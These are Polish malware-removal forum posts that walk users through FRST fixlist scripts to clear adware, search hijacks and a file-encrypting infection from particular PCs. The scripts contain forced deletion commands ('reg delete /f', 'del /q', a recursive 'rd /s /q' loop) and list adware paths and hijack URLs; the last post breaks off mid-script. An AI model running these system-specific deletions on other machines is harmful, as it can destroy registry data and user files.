picasso

Zasady działu się zmieniły. Przestarzały OTL nie jest już obowiązkowy (usuwam). Niekompletny zestaw raportów FRST - brak trzeciego pliku Shortcut. Temat przenoszę do działu Windows. To nie jest problem infekcji. W spoilerze tylko drobnostki, bez żadnego wpływu na zgłoszony problem. Z raportów nic nie wynika. Jedyne co się rzuca w oczy, to jakieś niesprecyzowane i różne błędy w Dzienniku zdarzeń (w tym "Odmowa dostępu" związana ze sferą Przywracania systemu): Application errors: ================== Error: (01/07/2015 09:46:40 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas badania interfejsu IVssWriterCallback. hr = 0x80070005, Odmowa dostępu. . To jest często spowodowane przez niepoprawne ustawienia zabezpieczeń w procesie zapisującym lub żądającym. Operacja: Zbieranie danych modułu zapisującego Kontekst: Identyfikator klasy modułu zapisującego: {e8132975-6f93-4464-a53e-1050253ae220} Nazwa modułu zapisującego: System Writer Identyfikator wystąpienia modułu zapisującego: {d38c7f72-b168-488a-b60f-c7db6dce72a8} Error: (12/15/2014 00:33:01 AM) (Source: MsiInstaller) (EventID: 1024) (User: oem-Komputer) Description: Produkt: Adobe Reader XI (11.0.09) - Polish - nie można zainstalować aktualizacji '{AC76BA86-7AD7-0000-2550-7A8C40011010}'. Kod błędu 1625. Instalator Windows może tworzyć dzienniki, aby ułatwić rozwiązywanie problemów z instalowaniem pakietów oprogramowania. Użyj następującego łącza, aby uzyskać instrukcje dotyczące włączania obsługi rejestrowania: http://go.microsoft.com/fwlink/?LinkId=23127 Error: (11/07/2014 03:30:21 PM) (Source: CoreLib) (EventID: 1000) (User: ) Description: Wystąpił błąd podczas deserializacji obiektu typu NetLimiter.Service.NLSvcSettings. Nieprawidłowe dane na poziomie głównym. Wiersz 1, pozycja 1. System errors: ============= Error: (01/20/2015 10:54:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Steam Client Service z powodu następującego błędu: %%1053 Error: (01/20/2015 10:54:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Steam Client Service. Error: (01/14/2015 06:41:27 PM) (Source: NetBT) (EventID: 4321) (User: ) Description: Nie można zarejestrować nazwy „WORKGROUP :1d” w interfejsie o adresie IP 192.168.0.101. Komputer o adresie IP 192.168.0.103 nie zezwolił na przejęcie tej nazwy przez ten komputer. Error: (01/03/2015 03:50:04 PM) (Source: Microsoft-Windows-Application-Experience) (EventID: 205) (User: ZARZĄDZANIE NT) Description: Usługa Asystent zgodności programów nie może wykonać inicjowania fazy drugiej. Error: (12/29/2014 10:29:02 PM) (Source: Microsoft-Windows-Application-Experience) (EventID: 205) (User: ZARZĄDZANIE NT) Description: Usługa Asystent zgodności programów nie może wykonać inicjowania fazy drugiej. Error: (12/27/2014 04:12:32 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 16:09:56 na ‎2014-‎12-‎27 było nieoczekiwane. Zastanowił mnie na moment ten NetLimiter 4 (oparty na aktywnym sterowniku). Sprawdziłabym co się stanie po jego tymczasowej deinstalacji. I nic więcej nie przychodzi mi do głowy.

vs. 1. Miałeś usunąć plik instalatora z Pobranych. YAC nie występuje na liście zainstalowanych programów. 2. Uruchom AdwCleaner ponownie, lecz tym razem wybierz sekwencję Szukaj + Usuń. Po czyszczeniu: 3. Otwórz Notatnik i wklej w nim: HKLM\...\Run: [HotKeysCmds] => C:\windows\system32\hkcmd.exe HKLM\...\Run: [Persistence] => C:\windows\system32\igfxpers.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine CMD: del /q C:\Users\sławek\Downloads\krelf1du.exe Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Zaprezentuj wynikowy fixlog.txt.

Kolejna porcja zadań: 1. W Google Chrome odmontuj rozszerzenie Speed Dial. Zastanawiałam się nad nim, a AdwCleaner ma zastrzeżenia i chce to usuwać. 2. Następnie uruchom AdwCleaner ponownie, lecz tym razem wybierz sekwencję Szukaj + Usuń. Po czyszczeniu: 3. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Zaprezentuj wynikowy fixlog.txt. Czy tytułowy problem z komunikatem "Serwer zajęty" nadal występuje?

1. Uruchom AdwCleaner ponownie, lecz tym razem wybierz sekwencję Szukaj + Usuń. Po czyszczeniu: 2. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Documents and Settings\Aga\Pulpit\FRST-OlderVersion RemoveDirectory: C:\Documents and Settings\Aga\Pulpit\Stare dane programu Firefox RemoveDirectory: C:\FRST\Quarantine Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

Wszystkie operacje pomyślnie wykonane. Kończymy: KOMPUTER 1: 1. Skasuj z Pulpitu foldery FRST2 i Stare dane programu Firefox. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. KOMPUTER 2: 1. W Google Chrome: Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy pozycję Ask (o ile widoczna). Przypuszczalnie tego śmiecia ładuje rozszerzenie Norton Security Toolbar. Symantec się zeszmacił i swoje paski ma sponsorowane niepożądanymi wyszukiwarkami Ask. 2. Skasuj z Pulpitu foldery FRST i Stare dane programu Firefox. 3. Zastosuj DelFix.

Na koniec: 1. Były usuwane zaszyfrowane pliki, co oznacza określone uszczerbki w katalogach aplikacji (np. katalogi rozszerzeń Google Chrome zostały przetrzebione). W przypadku widocznej usterki (brak ładowania jakiejś grafiki, etc.) należy dany program przeinstalować. 2. Na wszelki wypadek zmień hasła logowania w ważnych serwisach. PS. A ten odczyt ostrzeżeniowy na temat tapety już wiem skąd. To była adnotacja z załadowanego w tle konta nVidia UpdatusUser (konto nietypowe, niedostępne jako "normalne"). Już zgłosiłam ten fakt autorowi i znaczniki ostrzeżeniowe zostały usunięte.

Nazwy logów FRST wskazują, że wyciągasz je z katalogu C:\FRST\Logs. To jest archiwum logów i tam się głównie nie grzebie (o ile nie zajdzie potrzeba pokazania starszego raportu). Bieżące raporty są zawsze tam skąd uruchamiano FRST, czyli tu katalog Pobrane. Problem z czyszczeniem Google Chrome może wynikać z faktu, że są tu wstawione przez adware polityki blokujące określone funkcje przeglądarki. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hp&ts=1419852990&from=cor&uid=HitachiXHTS541060G9SA00_MPBCP0XGKJ30ZGKJ30ZGX" CHR Extension: (Hold Page) - C:\Users\Michał\AppData\Local\Google\Chrome\User Data\Default\Extensions\oneffdhofljmikcgfdanogcpiebjcmin [2014-12-31] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com S1 SBRE; \SystemRoot\system32\drivers\SBREDrv.sys [X] HKLM\...\Run: [sBRegRebootCleaner] => "C:\Program Files\STOPzilla\SBRC.exe" HKU\S-1-5-21-2700525546-531602145-408075403-1000\...\Run: [ALLUpdate] => "C:\Program Files\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-2700525546-531602145-408075403-1000\...\Run: [ALLPlayer WiFi Remote] => C:\Program Files\ALLPlayer Remote\ALLPlayerRemoteControl.exe HKU\S-1-5-21-2700525546-531602145-408075403-1000\...\Run: [Napisy24.pl] => "C:\Program Files\Napisy24\Napisy24.exe" AutoStart HKU\S-1-5-21-2700525546-531602145-408075403-1000\...\MountPoints2: {35269662-47c2-11e4-af7e-0016419e83e0} - F:\LGAutoRun.exe C:\Program Files\STOPzilla C:\ProgramData\STOPzilla! C:\Users\Michał\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Michał\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*localstorage* Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Hold Page. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Napraw niepoprawnie wyczyszczony (przypuszczalnie przez AdwCleaner) specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Michał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt oraz logi z folderu C:\AdwCleaner (nie uruchamiaj ponownie, chodzi o poprzednie logi).

W systemie jest ogromna ilość instalacji adware. Działania do wykonania: 1. Przez Panel sterowania odinstaluj adware Media+PlayerVidEd2.1, Reimage Repair, SmartWeb. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {4889ddce-7a83-45e6-afc9-1e4f1149fff4}Gw64; C:\Windows\System32\drivers\{4889ddce-7a83-45e6-afc9-1e4f1149fff4}Gw64.sys [48832 2015-02-03] (StdLib) R2 webinstrNewH; C:\Windows\system32\Drivers\webinstrNewH.sys [106456 2014-12-27] (Corsica) R2 82bea50f; c:\Program Files (x86)\CutterEdit\CutterEdit.dll [2353664 2015-01-18] () [File not signed] R2 b4704e3b; c:\Program Files (x86)\SystemAssister\SystemAssister.dll [1927680 2015-01-18] () [File not signed] R2 IHProtect Service; C:\Program Files (x86)\STab\ProtectService.exe [158864 2014-11-10] (TODO: ) R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [7410024 2015-01-14] (Reimage®) R2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [464384 2015-02-03] (SysTool PasSame LIMITED) [File not signed] S2 4dd8d474; "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\RelayDouble\RelayDouble.dll",serv S3 cpuz136; \??\C:\Users\Admin\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X] S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S3 SMUpdd; \??\C:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys [X] S2 Update Cyti Web; "C:\Program Files (x86)\Cyti Web\updateCytiWeb.exe" [X] S2 Util Cyti Web; "C:\Program Files (x86)\Cyti Web\bin\utilCytiWeb.exe" [X] Task: {09268FFA-65EC-4DFA-A183-33DF086675E9} - System32\Tasks\APSnotifierPP3 => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe Task: {4295E571-F86E-4BA5-AAFA-E0EDC7487210} - System32\Tasks\APSnotifierPP2 => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe Task: {56066274-369E-4977-AFA9-4F2DE98B2998} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 Task: {580E06B7-AC26-4553-A8A9-9E1D1EB800D6} - System32\Tasks\{8950104A-BAA4-4D7D-8ECA-A9CF20156427} => pcalua.exe -a "C:\Program Files (x86)\Cyti Web\CytiWebuninstall.exe" Task: {5D2309D7-290B-42AF-954E-E5A5F80533D1} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2014-11-30] () Task: {6FC20A39-6CD8-425B-9BF1-18DB8E193F55} - System32\Tasks\APSnotifierPP1 => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe Task: {80C54186-01D1-49CC-866D-7F4A7D038AD9} - System32\Tasks\LuckyTab => C:\Program Files (x86)\LuckyTab\LuckyTab.exe Task: {A36AA8A6-D688-492E-B0AA-2103E92356E4} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-01-14] (Reimage®) Task: {D27F3C77-2841-415D-BB7C-3DF10A750B55} - System32\Tasks\SMupdate1 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update1 Task: {D488BCAA-FCEB-4E1B-AA3A-DE4EE4E2303F} - System32\Tasks\SmartWeb Upgrade Trigger Task => C:\Users\Admin\AppData\Local\SmartWeb\SmartWebHelper.exe [2015-01-28] (SoftBrain Technologies Ltd.) Task: {E3172335-1454-4B78-AA66-232D3BBB13D7} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 Task: C:\Windows\Tasks\APSnotifierPP1.job => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe Task: C:\Windows\Tasks\APSnotifierPP2.job => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe Task: C:\Windows\Tasks\APSnotifierPP3.job => C:\Program Files (x86)\AnyProtectEx\AnyProtect.exe HKLM-x32\...\Run: [gmsd_pl_5] => [X] HKLM-x32\...\Run: [gmsd_pl_42] => [X] HKLM-x32\...\Run: [rec_pl_1] => [X] HKLM-x32\...\Run: [rec_pl_2] => [X] HKLM-x32\...\Run: [smartWeb] => C:\Users\Admin\AppData\Local\SmartWeb\SmartWebHelper.exe [270368 2015-01-28] (SoftBrain Technologies Ltd.) HKLM\...\Policies\Explorer: [NoControlPanel] 0 Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartWeb.lnk ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File BootExecute: autocheck autochk * aswBoot.exe /M:e3c391c91 /wow /dir:"C:\Program Files\AVAST Software\Avast" GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hppp&ts=1418079068&from=exp&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX /verysilent /hideuninstall HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hppp&ts=1418079068&from=exp&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX /verysilent /hideuninstall HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422968011&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&q={searchTerms} SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=face&utm_campaign=install_ie&utm_content=ds&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&ts=1422968126&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=face&utm_campaign=install_ie&utm_content=ds&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&ts=1422968126&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=face&utm_campaign=install_ie&utm_content=ds&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&ts=1422968126&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {ADE86A6D-9873-40C4-985B-EFC8D13D3878} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=face&utm_campaign=install_ie&utm_content=ds&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&ts=1422968126&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2305985715-200173359-747348330-1001 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=face&utm_campaign=install_ie&utm_content=ds&from=face&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX&ts=1422968126&type=default&q={searchTerms} BHO: HQ-Video-Pro-2.1V27.12 -> {11111111-1111-1111-1111-110611571181} -> C:\Program Files (x86)\HQ-Video-Pro-2.1V27.12\HQ-Video-Pro-2.1V27.12-bho64.dll No File BHO: Media+PlayerVidEd2.1 -> {11111111-1111-1111-1111-110611791113} -> C:\Program Files (x86)\Media+PlayerVidEd2.1\Media+PlayerVidEd2.1-bho64.dll (Enter) BHO: deaoielyyprize -> {140848b7-ba94-4612-871b-1419493e870c} -> C:\ProgramData\deaoielyyprize\5nn11NmzMfokOG.x64.dll () BHO: apaPsave -> {48d798ae-8cb8-4403-8e2e-a2cfd02abbab} -> C:\ProgramData\apaPsave\bhaNKpXrgVKPy1.x64.dll () BHO: nitroDeal -> {59de4826-a00e-475f-8311-b5580916e3c1} -> C:\ProgramData\nitroDeal\KTLTd32RimTYV7.x64.dll () BHO: nnItrodeeal -> {87f6fba8-c6eb-4f03-9e18-12a29daee7a7} -> C:\ProgramData\nnItrodeeal\yaL8qPURPSmwEB.x64.dll () BHO-x32: HQ-Video-Pro-2.1V27.12 -> {11111111-1111-1111-1111-110611571181} -> C:\Program Files (x86)\HQ-Video-Pro-2.1V27.12\HQ-Video-Pro-2.1V27.12-bho.dll No File BHO-x32: Media+PlayerVidEd2.1 -> {11111111-1111-1111-1111-110611791113} -> C:\Program Files (x86)\Media+PlayerVidEd2.1\Media+PlayerVidEd2.1-bho.dll (Enter) BHO-x32: deaoielyyprize -> {140848b7-ba94-4612-871b-1419493e870c} -> C:\ProgramData\deaoielyyprize\5nn11NmzMfokOG.dll () BHO-x32: IETabPage Class -> {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} -> C:\Program Files (x86)\XTab\SupTab.dll (Thinknice Co. Limited) BHO-x32: apaPsave -> {48d798ae-8cb8-4403-8e2e-a2cfd02abbab} -> C:\ProgramData\apaPsave\bhaNKpXrgVKPy1.dll () BHO-x32: nitroDeal -> {59de4826-a00e-475f-8311-b5580916e3c1} -> C:\ProgramData\nitroDeal\KTLTd32RimTYV7.dll () BHO-x32: nnItrodeeal -> {87f6fba8-c6eb-4f03-9e18-12a29daee7a7} -> C:\ProgramData\nnItrodeeal\yaL8qPURPSmwEB.dll () StartMenuInternet: IEXPLORE.EXE - iexplore.exe FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\webssearches.xml FF HKLM-x32\...\Firefox\Extensions: [fftoolbar2014@etech.com] - C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pn8gqu1z.default\extensions\fftoolbar2014@etech.com FF HKLM-x32\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pn8gqu1z.default\extensions\faststartff@gmail.com FF HKU\S-1-5-21-2305985715-200173359-747348330-1001\...\Firefox\Extensions: [{4B55B3C6-B7D6-F951-65AD-4BBEB0EF1F8E}] - C:\Program Files (x86)\ver2SpeedCheck\184.xpi CHR StartupUrls: Default -> "hxxp://istart.webssearches.com/?type=hppp&ts=1418079068&from=exp&uid=HGSTXHTS541010A9E680_JB1000132X9RZP2X9RZPX\t/verysilent /hideuninstall" CHR DefaultSearchKeyword: Default -> webssearches HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" C:\Program Files\Common Files\mcafee C:\Program Files\Common Files\System\SysMenu.dll C:\Program Files\Reimage C:\Program Files (x86)\6add4cc5-a266-486a-81cd-809c0a8fba83 C:\Program Files (x86)\CutterEdit C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\HQ-Video-Pro-2.1V27.12 C:\Program Files (x86)\LuckyTab C:\Program Files (x86)\Media+PlayerVidEd2.1 C:\Program Files (x86)\predm C:\Program Files (x86)\RelayDouble C:\Program Files (x86)\STab C:\Program Files (x86)\SystemAssister C:\Program Files (x86)\XTab C:\ProgramData\352b27b7506f20d3 C:\ProgramData\apaPsave C:\ProgramData\CoupExtension C:\ProgramData\d09d987b00003f95 C:\ProgramData\deaoielyyprize C:\ProgramData\GreatSave4U C:\ProgramData\ifophngfmomhnbechadpikpkbopikibe C:\ProgramData\MFAData C:\ProgramData\nitroDeal C:\ProgramData\nnItrodeeal C:\ProgramData\pbfmjflhfenidpddejoaeggopfdbepjd C:\ProgramData\Trusted Publisher C:\ProgramData\WindowsMangerProtect C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair C:\Users\Admin\AppData\Local\nsyCEF3.tmp C:\Users\Admin\AppData\Local\Avg2014 C:\Users\Admin\AppData\Local\CrashRpt C:\Users\Admin\AppData\Local\globalUpdate C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local storage\*localstorage* C:\Users\Admin\AppData\Local\SmartWeb C:\Users\Admin\AppData\Roaming\appdataFr2.bin C:\Users\Admin\AppData\Roaming\BMFHCHWA C:\Users\Admin\AppData\Roaming\LBOVY C:\Users\Admin\AppData\Roaming\OLLRJBOY C:\Users\Admin\AppData\Roaming\TCEAppLauncherLog.txt C:\Users\Admin\AppData\Roaming\UNDIQAF C:\Users\Admin\AppData\Roaming\337Games C:\Users\Admin\AppData\Roaming\AnyProtectEx C:\Users\Admin\AppData\Roaming\omiga-plus C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Storage\*localstorage* C:\Users\Admin\AppData\Roaming\systweak C:\Users\Admin\Desktop\Continue Live Installation.lnk C:\Users\Public\Documents\ShopperPro C:\Windows\patsearch.bin C:\Windows\Reimage.ini C:\Windows\system32\OptimizerMonitorOff.ini C:\Windows\system32\roboot64.exe C:\Windows\System32\drivers\{4889ddce-7a83-45e6-afc9-1e4f1149fff4}Gw64.sys C:\Windows\system32\drivers\Msft_Kernel_webinstrNHKT_01009.Wdf C:\Windows\system32\drivers\webinstrNewH.sys C:\Windows\SysWOW64\OptimizerMonitor.ini C:\Windows\SysWOW64\OptimizerMonitorOff.ini Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 4. Wyczyść Google Chrome z adware: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Wyczyść Operę z adware: CTRL+SHIFT+E i na liście Rozszerzeń odinstaluj adware HQ-Video-Pro-2.1V27.12, Media+PlayerVidEd2.1 oraz jeden z Adblocków (obecnie za dużo). 6. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Infekcja pomyślnie usunięta. 1. Ustawienia tapety nadal nie zostały skorygowane na poziomie rejestru. Miałeś w opcjach zmienić ją wskazując dowolny niezaszyfrowany plik. 2. Pokaż listę zaszyfrowanych plików z dysku C. Uruchom FRST, w polu Search wklej: *scqwxua* Klik w Search Files i dostarcz wynikowy log. Może być bardzo duży.

Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: HKU\S-1-5-21-1031630780-3175621160-1081558820-1000\...\Run: [Tok-Cirrhatus-1431] => C:\Users\max\AppData\Local\br3885on.exe [49152 2008-05-29] () HKU\S-1-5-21-1031630780-3175621160-1081558820-1000\...\Run: [Tok-Cirrhatus] => [X] Startup: C:\Users\max\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif () Task: {C5486121-A29D-43BA-AEC4-3C7F1F3F62A9} - System32\Tasks\{0081150D-F2CE-4CAB-BFCE-A3206AAAD7E3} => pcalua.exe -a F:\programy\programy.exe -d F:\programy C:\Users\max\AppData\Local\*.bin C:\Users\max\AppData\Local\*.exe C:\Users\max\AppData\Local\*.txt CMD: for /d %f in (C:\Users\max\AppData\Local\*bron*) do rd /s /q "%f" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich 